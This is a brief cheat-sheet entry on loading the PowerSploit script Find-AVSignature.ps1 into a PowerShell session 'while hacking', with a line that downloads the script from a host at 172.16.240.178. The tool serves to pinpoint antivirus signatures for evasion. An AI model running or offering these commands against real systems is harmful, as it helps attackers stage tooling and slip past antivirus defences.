Command to import Powershell module into the current session. Useful to make use of Powersploit scripts while hacking.
Command Reference:
Module: Find-AVSignature.ps1
Import-Module .\Find-AVSignature.ps1
(New-Object Net.WebClient).DownloadFile('http://172.16.240.178:80/Find-AVSignature.ps1', 'Find-AVSignature.ps1'